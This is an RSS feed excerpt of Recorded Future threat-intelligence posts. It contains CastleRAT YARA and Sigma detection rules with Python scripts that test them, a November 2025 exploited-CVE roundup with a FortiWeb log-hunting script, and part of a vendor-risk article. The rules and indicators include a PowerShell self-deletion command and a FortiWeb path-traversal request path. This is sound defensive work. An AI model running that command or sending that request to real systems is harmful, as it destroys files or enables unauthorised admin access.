        hash = "60125159523c356d711ffa1076211359906e6283e25f75f4cf0f9dc8da6bf7b0"
        hash = "cf202498b85e6f0ae4dffae1a65acbfec78cc39fce71f831d45f916c7dedfa0c"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $log_tag1 = "clipboardlog.txt" fullword wide
        $log_tag2 = "keylog.txt" fullword wide
        $wnd_class1 = "IsabellaWine" fullword wide
        $wnd_class2 = "camera!" fullword wide
        $log_fmt1 = "[%02d:%02d %02d.%02d.%02d] %ws" fullword wide
        $log_fmt2 = "[%02d:%02d %02d.%02d.%02d] " fullword wide
        $log_fmt3 = "[%02d.%02d.%02d %02d:%02d] " fullword wide
        $s1 = "(VPN)" wide ascii
        $s2 = "rundll32 \"C:\\Windows\\System32\\shell32.dll\" #61" wide
        $s3 = "\"%ws\" -no-deelevate" fullword wide
        $s4 = "IsWindowVisible" fullword ascii
        $s5 = "UAC_InputIndicatorOverlayWnd" fullword wide
        $s6 = "www.ip-api.com" fullword wide
        $s7 = "MachineGuid" fullword wide
        $s8 = "line/?fields=" wide
        $s9 = "C:\\Windows\\System32\\cmd.exe" wide
        $s10 = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" fullword wide
    condition:
        uint16(0) == 0x5a4d and
        any of ($log_tag*) and
        any of ($wnd_class*) and
        any of ($log_fmt*) and
        all of ($s*)
}

rule MAL_CastleRAT_Shellcode_Loader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-10-20"
        description = "Detection of a python based shellcode loader that runs CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        hash = "058d83fd8834246d6d2a2771e6e0aeb4d4ef8a6984cbe1133f3a569029a4b1f7"
        hash = "190e673787bfc6e8eeebccd64c8da61747d5be06f87d3aea879118ef1a9f4836"
        malware = "CastleRAT"
        actor = "TAG-150"
        actor_id = "9nk6DO"
        category = "MALWARE"
        malware_id = "9WCga-"
    strings:
        $s1 = "SHELL64_OFFSET = "
        $s2 = "SHELL32_OFFSET = "
        $s3 = "SHELLFUNC = WINFUNCTYPE"
        $s4 = "LoadPE_Shell"
        $s5 = "crt = WinDLL(\"msvcrt.dll\");"
        $s6 = "OPEN_EXISTING" fullword
        $s7 = ".VirtualProtect("
        $s8 = "offset"
        $s9 = "from ctypes"
    condition:
        filesize &lt; 50KB and $s9 at 0 and all of them
}
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix N: CastleRAT Sigma Rules</h2>
        <div>
          <div>
            <div>
              <pre><code>title: CastleRAT C Variant Malware Log File Creation
id: 4d785ac8-17fe-4765-b427-9a31073ad1a7
status: stable
description: Detects CastleRAT C variant malware log file creation events. The log file is used to store output from the keylogger and clipboard stealer.
references:
  - https://tria.ge/250701-v6911aykv9
  - https://tria.ge/251101-r8f9xstjap
author: Insikt Group, Recorded Future
date: 2025-08-29
level: high
tags:
  - attack.t1608 # Stage Capabilities
  - attack.t1074.001 # Local Data Staging
  - attack.t1115 # Clipboard Data
  - attack.t1056.001 # Keylogging
logsource:
  product: windows
  category: file_event
detection:
  castlerat_logs:
    TargetFilename|endswith:
      - '\AppData\Local\Temp\MuuuuuhGer3'
      - '\AppData\Local\Temp\PluhhSuk3'
      - '\AppData\Local\Temp\AsdDsaHaha3'
      - '\AppData\Local\Temp\ChuChuka'
      - '\AppData\Local\Temp\GagikMaraguiSS'
      - '\AppData\Local\Temp\LowUshrSudujes'
      - '\AppData\Local\Temp\RarnuiKarta'
      - '\AppData\Local\Temp\GrazGraznii'
      - '\AppData\Local\Temp\GiveGvein3'
      - '\AppData\Local\Temp\BeruiowdgsouiHTR'
      - '\AppData\Local\Temp\GDSongdsgndohSDU'
      - '\AppData\Local\JohniiDepp'
      - '\AppData\Local\LuchiiSvet'
      - '\AppData\Local\HmmMaybe'
  condition: castlerat_logs
falsepositives:
  - Unlikely

title: CastleRAT Python Malware Self Deletion
id: 1050a0c4-1110-4b55-938c-0d27259ddd1e
status: stable
description: Detects the execution of powershell by the Python variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/250822-r3a6qaak2t
author: Insikt Group, Recorded Future
date: 2025-08-28
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity

title: CastleRAT C Malware Self Deletion
id: 79268bc8-3220-447d-bc7a-02199bed58e9
status: stable
description: Detects the execution of powershell by the C variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/251101-lh19hstqft/behavioral2
author: Insikt Group, Recorded Future
date: 2025-11-06
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity
</code></pre>
            </div>
          </div>
        </div>
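<p>The Python script below is an added example written for this page, not Insikt Group's code. It evaluates the three Sigma rules above against a handful of constructed Sysmon-style events, compiling each <code>endswith</code> value the way a Sigma backend does: matching is case-insensitive, backslashes are literal, and an unescaped <code>*</code> is a wildcard. That last point is a caveat worth knowing before deploying the two self-deletion rules: as written, <code>-Path * -Force</code> matches any path between <code>-Path</code> and <code>-Force</code>, so the rules are broader than a literal reading suggests; escape the asterisk as <code>\*</code> if only the literal character should match. The event dictionaries and field values are constructed for illustration.</p>

```python
import re

# Field values copied from the three Sigma rules in the appendix above.
CASTLERAT_LOG_SUFFIXES = [
    r"\AppData\Local\Temp\MuuuuuhGer3",
    r"\AppData\Local\Temp\PluhhSuk3",
    r"\AppData\Local\Temp\AsdDsaHaha3",
    r"\AppData\Local\Temp\ChuChuka",
    r"\AppData\Local\Temp\GagikMaraguiSS",
    r"\AppData\Local\Temp\LowUshrSudujes",
    r"\AppData\Local\Temp\RarnuiKarta",
    r"\AppData\Local\Temp\GrazGraznii",
    r"\AppData\Local\Temp\GiveGvein3",
    r"\AppData\Local\Temp\BeruiowdgsouiHTR",
    r"\AppData\Local\Temp\GDSongdsgndohSDU",
    r"\AppData\Local\JohniiDepp",
    r"\AppData\Local\LuchiiSvet",
    r"\AppData\Local\HmmMaybe",
]

SELF_DELETE_RULES = {
    "CastleRAT Python Malware Self Deletion":
        "powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit",
    "CastleRAT C Malware Self Deletion":
        "powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force",
}


def sigma_endswith(value):
    """Compile a Sigma 'endswith' value as a backend would: case-insensitive,
    unescaped '*' is a wildcard, '?' matches one character, '\\*' '\\?' '\\\\'
    are literal, and any other backslash is a literal backslash."""
    out = []
    chars = iter(value)
    for ch in chars:
        if ch == "\\":
            nxt = next(chars, "")
            if nxt in ("*", "?", "\\"):
                out.append(re.escape(nxt))          # escaped wildcard -> literal
            else:
                out.append(re.escape("\\" + nxt))   # lone backslash stays literal
        elif ch == "*":
            out.append(".*")
        elif ch == "?":
            out.append(".")
        else:
            out.append(re.escape(ch))
    return re.compile("".join(out) + r"\Z", re.IGNORECASE | re.DOTALL)


LOG_PATTERNS = [sigma_endswith(s) for s in CASTLERAT_LOG_SUFFIXES]
SELF_DELETE_PATTERNS = {t: sigma_endswith(v) for t, v in SELF_DELETE_RULES.items()}


def evaluate(event):
    """Return the titles of the appendix rules that fire on one event.
    Events are flat dicts: a 'category' key plus Sysmon-style field names."""
    hits = []
    if event.get("category") == "file_event":
        target = event.get("TargetFilename", "")
        if any(p.search(target) for p in LOG_PATTERNS):
            hits.append("CastleRAT C Variant Malware Log File Creation")
    elif event.get("category") == "process_creation":
        cmd = event.get("CommandLine", "")
        hits.extend(t for t, p in SELF_DELETE_PATTERNS.items() if p.search(cmd))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"category": "file_event", "Image": r"C:\Users\victim\AppData\Roaming\svc.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\MuuuuuhGer3"},
    {"category": "file_event", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\MuuuuuhGer3.tmp"},
    {"category": "process_creation", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force"},
    {"category": "process_creation", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit"},
    # '*' in the rule is a Sigma wildcard, so a concrete path also fires the C rule.
    {"category": "process_creation", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell Start-Sleep -Seconds 3; Remove-Item -Path C:\ProgramData\x.exe -Force"},
    {"category": "process_creation", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell Get-Process"},
]


def run(events=SAMPLE_EVENTS):
    """Evaluate every event; return [(index, [rule titles]), ...] for hits only."""
    results = [(i, evaluate(e)) for i, e in enumerate(events)]
    return [(i, hits) for i, hits in results if hits]


if __name__ == "__main__":
    for index, hits in run():
        print(index, hits)
```

<p>Running it prints hits for events 0, 2, 3 and 4; event 1 (a <code>.tmp</code> sibling of the log file) and event 5 stay silent. Event 4 is the one to look at: it carries a concrete path rather than a literal asterisk and still matches the C-variant rule, which is exactly what a Sigma backend will do with the rule as published.</p>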
        <h2>Appendix O: MITRE ATT&amp;CK Techniques</h2>
        <div>
          <div>
            <div><strong>Tactic: Technique</strong></div>
            <div><strong>ATT&amp;CK Code</strong></div>
          </div>
          <div>
            <div><strong>Initial Access:</strong> Phishing</div>
            <div>T1566</div>
          </div>
          <div>
            <div><strong>Initial Access:</strong> Drive-by Compromise</div>
            <div>T1189</div>
          </div>
          <div>
            <div><strong>Execution:</strong> User Execution: Malicious File</div>
            <div>T1204.002</div>
          </div>
          <div>
            <div><strong>Execution:</strong> User Execution: Malicious Copy and Paste</div>
            <div>T1204.004</div>
          </div>
          <div>
            <div><strong>Execution:</strong> Command and Scripting Interpreter: PowerShell</div>
            <div>T1059.001</div>
          </div>
          <div>
            <div><strong>Execution:</strong> Command and Scripting Interpreter: AutoHotKey &amp; AutoIT</div>
            <div>T1059.010</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Domains</div>
            <div>T1583.001</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Virtual Private Server</div>
            <div>T1583.003</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Server</div>
            <div>T1583.004</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Access</div>
            <div>T1650</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Obtain Capabilities: Tool</div>
            <div>T1588.002</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Compromise Accounts: Email Accounts</div>
            <div>T1586.002</div>
          </div>
          <div>
            <div><strong>Defense Evasion:</strong> Masquerading</div>
            <div>T1036</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Proxy: External Proxy</div>
            <div>T1090.002</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Application Layer Protocol: Web Protocols</div>
            <div>T1071.001</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Ingress Tool Transfer</div>
            <div>T1105</div>
          </div>
          <div>
            <div><strong>Collection:</strong> Data from Local System</div>
            <div>T1005</div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_171fa690104f0a5274fe66bfe605332a13a3fc906.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October]]></title>
            <link>https://www.recordedfuture.com/blog/november-2025-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/november-2025-cve-landscape</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[November 2025 CVE landscape: 10 exploited critical vulnerabilities, a 69% drop from October, and why Fortinet and Samsung flaws need urgent patching.]]></description>
            <content:encoded><![CDATA[
        <p>November 2025 saw a significant 69% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>10 vulnerabilities</strong> requiring immediate attention, <a href="https://www.recordedfuture.com/blog/october-2025-cve-landscape">down from 32 in October</a>.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>Fortinet leads concerns:</strong> Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation</li>
          <li><strong>LANDFALL spyware campaign:</strong> Threat actors weaponized Samsung's image processing flaw (CVE-2025-21042) for zero-click Android attacks</li>
          <li><strong>Public exploits proliferate:</strong> Seven of ten vulnerabilities have public proof-of-concept code available</li>
          <li><strong>OS Command Injection and Out-of-bounds Write</strong> were tied as the most common weakness types</li>
        </ul>
        <p><strong>Bottom line:</strong> The reduced volume shouldn't signal reduced vigilance. November's vulnerabilities demonstrate that threat actors favored quality over quantity in their exploitation campaigns.</p>
        <h2>Quick Reference: November 2025 Vulnerability Table</h2>
        <p><em>All 10 vulnerabilities below were actively exploited in November 2025.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAWo-07/overview">CVE-2025-12480</a></div>
            <div>99</div>
            <div>Gladinet Triofox</div>
            <div>CWE-284 (Improper Access Control)</div>
            <div>No</div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAY-aVO/overview">CVE-2025-62215</a></div>
            <div>99</div>
            <div>Microsoft Windows 10 and 11; Microsoft Windows Server 2019, 2022, and 2025</div>
            <div>CWE-362 (Race Condition), CWE-415 (Double Free)</div>
            <div><a href="https://github.com/search?q=%22CVE-2025-62215%22&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAgNrn4/overview">CVE-2025-64446</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-23 (Relative Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-64446&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAnoPpx/overview">CVE-2025-13223</a></div>
            <div>99</div>
            <div>Google Chrome</div>
            <div>CWE-843 (Type Confusion)</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BApQp8P/overview">CVE-2025-58034</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-58034&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/_ob8BJ/overview">CVE-2025-61757</a></div>
            <div>99</div>
            <div>Oracle Identity Manager</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div><a href="https://github.com/search?q=CVE-2025-61757&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/-R66PT/overview">CVE-2025-9242</a></div>
            <div>99</div>
            <div>WatchGuard Fireware OS</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/search?q=CVE-2025-9242&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/-HNHUv/overview">CVE-2025-21042</a></div>
            <div>99</div>
            <div>Samsung Mobile Devices</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/B1ack4sh/Blackash-CVE-2025-21042">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/6VoCY0/overview">CVE-2025-48703</a></div>
            <div>99</div>
            <div>CentOS Web Panel</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-48703&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/iwWgRF/overview">CVE-2021-26829</a></div>
            <div>99</div>
            <div>OpenPLC ScadaBR</div>
            <div>CWE-79 (Improper Neutralization of Input During Web Page Generation [Cross-site Scripting])</div>
            <div>No</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in November based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends: November 2025</h2>
        <h3>Vendors Most Affected</h3>
        <ul>
          <li><strong>Fortinet</strong> dominated with two critical FortiWeb vulnerabilities, both enabling remote exploitation</li>
          <li><strong>Microsoft</strong> faced a kernel-level race condition affecting all modern Windows versions</li>
          <li><strong>Samsung</strong> saw the weaponization of an image processing vulnerability for sophisticated mobile attacks</li>
          <li>Additional affected vendors: Gladinet, Google, Oracle, WatchGuard, CentOS, and Autonomy (OpenPLC)</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-78</strong> – OS Command Injection (tied for first)</li>
          <li><strong>CWE-787</strong> – Out-of-bounds Write (tied for first)</li>
          <li><strong>CWE-284</strong> – Improper Access Control</li>
          <li><strong>CWE-362</strong> – Race Condition</li>
          <li><strong>CWE-306</strong> – Missing Authentication for Critical Function</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong>LANDFALL Android spyware campaign</strong> marked November's most sophisticated operation:</p>
        <ul>
          <li>Exploited <strong>CVE-2025-21042</strong> for zero-click remote code execution on Samsung devices</li>
          <li>Targeted users in Iraq, Iran, Turkey, and Morocco with commercial-grade spyware</li>
          <li>Deployed via weaponized DNG image files through WhatsApp</li>
          <li>Achieved persistent device compromise without user interaction</li>
          <li>Demonstrated advanced anti-analysis and SELinux bypass capabilities</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2025-64446 | Fortinet FortiWeb</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added November 14, 2025</p>
        <p><strong>Why this matters:</strong> Unauthenticated attackers can bypass authentication entirely and create administrative accounts. With 4,768 exposed FortiWeb instances globally, this represents a critical internet-facing risk.</p>
        <p><strong>Affected versions:</strong> FortiWeb 8.0.0-8.0.1, 7.6.0-7.6.4, 7.4.0-7.4.9, 7.2.0-7.2.11, 7.0.0-7.0.11</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Apply Fortinet's security updates (8.0.2, 7.6.5, 7.4.10, 7.2.12, or 7.0.12)</li>
          <li>Monitor for POST requests to <code>/api/v2.0/cmd/system/admin%3F/../../../cgi-bin/fwbcgi</code></li>
          <li>Check for unauthorized admin accounts created since October 2025</li>
          <li>Review logs for Base64-encoded CGIINFO headers</li>
          <li>Disable HTTP/HTTPS on internet-facing interfaces if patching is delayed</li>
        </ul>
        <p><strong>Exposure:</strong> ~4,768 FortiWeb instances visible on Shodan (Netherlands, US, Germany, Italy, Peru)</p>
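<p>As an added example (not part of the original post, and not Fortinet's or Recorded Future's code), the Python script below applies two of the checks listed above to a constructed web-access log: it percent-decodes each request path and flags POSTs that use <code>..</code> traversal to reach <code>/cgi-bin/fwbcgi</code>, including the double-encoded form, and it base64-decodes any <code>CGIINFO</code> header value it sees. The log line format, the sample requests and the JSON placed inside the sample header are assumptions made for the example; FortiWeb's real log schema and the structure of the exploit payload are not shown on this page.</p>

```python
import base64
import json
import re
from urllib.parse import unquote

# Constructed, simplified access-log format (an assumption for this example,
# not FortiWeb's real log schema):
#   <timestamp> <src_ip> "<METHOD> <raw_path> HTTP/1.1" <status> cgiinfo="<base64 or ->"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) cgiinfo="(?P<cgiinfo>[^"]*)"$'
)

TARGET_SUFFIX = "/cgi-bin/fwbcgi"


def decode_path(raw_path):
    """Percent-decode twice so %3F -> ? and %253F -> %3F -> ? are both caught.
    Double decoding over-approximates on purpose: this is a hunting filter."""
    return unquote(unquote(raw_path))


def is_traversal_to_fwbcgi(raw_path):
    """True when the decoded path contains a '..' segment and ends on the
    fwbcgi handler, the shape of the request described in the article."""
    decoded = decode_path(raw_path)
    segments = decoded.split("/")
    return ".." in segments and decoded.rstrip("/").endswith(TARGET_SUFFIX)


def decode_cgiinfo(value):
    """Return the decoded CGIINFO value (parsed JSON when possible, else raw
    bytes), or None when the header is absent or not valid base64."""
    if value in ("", "-"):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    try:
        return json.loads(raw)
    except ValueError:          # not UTF-8 or not JSON: keep the bytes
        return raw


def scan(log_text):
    """Evaluate every line; return [(line_no, reason, detail), ...]."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["method"] == "POST" and is_traversal_to_fwbcgi(m["path"]):
            findings.append((line_no, "traversal-to-fwbcgi", decode_path(m["path"])))
        payload = decode_cgiinfo(m["cgiinfo"])
        if payload is not None:
            findings.append((line_no, "cgiinfo-header", payload))
    return findings


# Constructed sample traffic. The JSON fields inside CGIINFO are an assumption
# chosen for illustration, not the documented exploit payload.
_FAKE_CGIINFO = base64.b64encode(
    json.dumps({"username": "admin", "vdom": "root"}).encode()
).decode()

SAMPLE_LOGS = "\n".join([
    '2025-11-14T10:01:02Z 203.0.113.7 "POST /api/v2.0/cmd/system/admin%3F/../../../cgi-bin/fwbcgi HTTP/1.1" 200 '
    f'cgiinfo="{_FAKE_CGIINFO}"',
    '2025-11-14T10:01:09Z 198.51.100.4 "GET /api/v2.0/system/status HTTP/1.1" 200 cgiinfo="-"',
    '2025-11-14T10:02:33Z 203.0.113.7 "POST /api/v2.0/cmd/system/admin%253F/..%2F..%2F..%2Fcgi-bin/fwbcgi HTTP/1.1" 200 cgiinfo="-"',
    '2025-11-14T10:03:00Z 192.0.2.10 "POST /api/v2.0/cmd/system/admin HTTP/1.1" 403 cgiinfo="-"',
])

if __name__ == "__main__":
    for line_no, reason, detail in scan(SAMPLE_LOGS):
        print(f"line {line_no}: {reason}: {detail}")
```

<p>Two findings come out of line 1 (the traversal and the decoded header) and one out of line 3, whose path only reveals the traversal after a second round of percent-decoding; the plain <code>/api/v2.0/cmd/system/admin</code> request on line 4 is left alone. Normalising the path with something like <code>posixpath.normpath</code> would not help here, because the segment before the first <code>..</code> is <code>admin?</code> and a standards-compliant normaliser resolves it to <code>/api/v2.0/cgi-bin/fwbcgi</code>; matching on the <code>..</code> segments and the handler suffix is more robust.</p>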
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13b330b3e13aad900440407bcd3dde599640b59e9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="797" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-64446 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1afc13c5574e9a8966347fe80012616de5d023fd2.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[5 Real-World Third-Party Risk Examples]]></title>
            <link>https://www.recordedfuture.com/blog/third-party-risk-examples</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/third-party-risk-examples</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore 5 third-party risk examples, from vendor data breaches to supply chain attacks and learn how third-party risk management can prevent cyberattacks.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Static vendor checks fall short:</strong> Traditional, point-in-time third-party risk management practices (e.g. annual questionnaires) leave organizations blind to emerging vendor threats between audits. Continuous monitoring is now a must.</li>
          <li><strong>Five common risk scenarios:</strong> Supply chain attacks, widespread software vulnerabilities, hidden fourth-party dependencies, vendor credential theft, and vendor instability each illustrate how “trusting” vendors can lead to breaches or business disruptions.</li>
          <li><strong>Intelligence-driven defense:</strong> Recorded Future’s platform provides real-time visibility into your vendor ecosystem—from dark web credential leaks to fourth-party relationships—enabling proactive mitigation before incidents impact your organization.</li>
          <li><strong>From trust to verification:</strong> The solution is to move from static trust to continuous verification. By continuously assessing vendors’ cyber and business health (and even integrating intelligence into workflows like ServiceNow), security leaders can vastly strengthen their vendor risk management framework.</li>
        </ul>
        <h2>Your Vendor Ecosystem Is a Black Box: It’s Time to Turn on the Lights</h2>
        <p>For CISOs and risk leaders, the attack surface now goes far beyond the footprint of the business. It’s a sprawling web of SaaS vendors, software suppliers, MSPs, payment processors, logistics partners, and niche fourth parties your vendors rely on. Every connection expands risk—often outside direct visibility. In other words, your security may only be as strong as your weakest vendor or partner.</p>
        <p>Traditional third-party risk management (TPRM)—static security questionnaires and annual audits—cannot keep pace. They describe what a vendor claimed their security looked like months ago, not what it is right now. Meanwhile, the most damaging events (supply chain attacks, zero-day exploitation, credential resale, concentration failures) unfold in hours and days, not quarters.</p>
        <p>This gap between point-in-time paperwork and real-time risk is why third-party exposure has become a primary vector for catastrophic breaches and business outages.</p>
        <p>This article highlights and analyzes five real-world third-party risk examples. For each, we show why traditional methods fail and how continuous, real-time <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/third-party-risk-management">third-party risk management</a> and threat intelligence are the only effective prevention.</p>
        <h2>5 Third-Party Risk Examples and How to Prevent Them</h2>
        <p>Modern vendor risk comes in many forms. Let’s explore five common scenarios—and how proactive measures can stop them:</p>
        <h3>Type 1: The Software Supply Chain Attack</h3>
        <p><strong>The Scenario:</strong> One of the most damaging third-party risks is a software supply chain attack. This occurs when threat actors breach a trusted software vendor’s development environment and secretly inject malicious code into a legitimate, digitally signed software update. The tainted update, a “Trojan horse,” is then distributed to the vendor’s customers, giving the attacker access into thousands of networks at once.</p>
        <p><strong>Real-World Example:</strong> <a href="https://www.gao.gov/blog/solarwinds-cyberattack-demands-significant-federal-and-private-sector-response-infographic">The SolarWinds Orion breach</a> is a quintessential case. In 2020, nation-state hackers compromised SolarWinds’ build pipeline and inserted malware into an Orion software update. The malicious update, being validly signed, was pushed to around 18,000 customers, including numerous government agencies and Fortune 500 companies, who installed it as a routine update, thereby granting the attackers insider access to their systems.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A standard vendor security questionnaire or audit would never have caught this. SolarWinds had passed assessments and appeared reputable. The update itself was digitally signed and appeared “trusted” to antivirus scanners and other controls. In short, you cannot audit your way out of a risk that’s been inserted into a trusted product’s software supply chain.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Preventing a supply chain attack means detecting subtle warning signs before the breach fully unfolds. Recorded Future’s platform continuously monitors for early indicators tied to your vendors. If threat actors known for targeting CI/CD pipelines start discussing or probing one of your software vendors, you’d know. If intelligence suggests a vendor’s code-signing certificate may be compromised, you’d get an alert. Armed with this foresight, you could elevate that vendor’s risk status, scrutinize their software updates more closely, and even hunt for indicators of compromise in your environment before the breach becomes public knowledge.</p>
        <h3>Type 2: The Widespread Third-Party Vulnerability</h3>
        <p><strong>The Scenario:</strong> A critical software vulnerability (often a zero-day) is discovered in a common component that many of your vendors use. It could be an open-source library, a popular IT tool, or a cloud service. You have no direct visibility that your suppliers rely on this component. Attackers quickly develop an exploit and start compromising organizations at scale via this flaw, long before most victims even realize they’re exposed through their third parties.</p>
        <p><strong>Real-World Example:</strong> The <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a">MOVEit Transfer zero-day</a> (exploited by the Cl0p ransomware group) and the <a href="https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance">Log4j “Log4Shell” vulnerability</a> are perfect examples of this risk. In the case of MOVEit, a single bug in a widely used file-transfer product led to the mass theft of data from thousands of companies, many of whom weren’t even direct customers of MOVEit, but their vendors were. Similarly, the Log4j flaw impacted countless businesses indirectly because software used by their contractors and providers included the vulnerable library.</p>
        <p><strong>Why Traditional Methods Fail:</strong> This is fundamentally a technology visibility problem. A point-in-time survey asking your vendors “Do you use MOVEit?” is too little, too late. By the time you send out a questionnaire and get a reply (if you get one at all), attackers may have already exploited the vulnerability and exfiltrated data. No organization can manually track every piece of software in their extended vendor ecosystem through periodic check-ins. In the MOVEit incident, many companies had no idea they were at risk until news of data breaches surfaced. Traditional vendor risk management simply isn’t designed to monitor technical exposure in real time.</p>
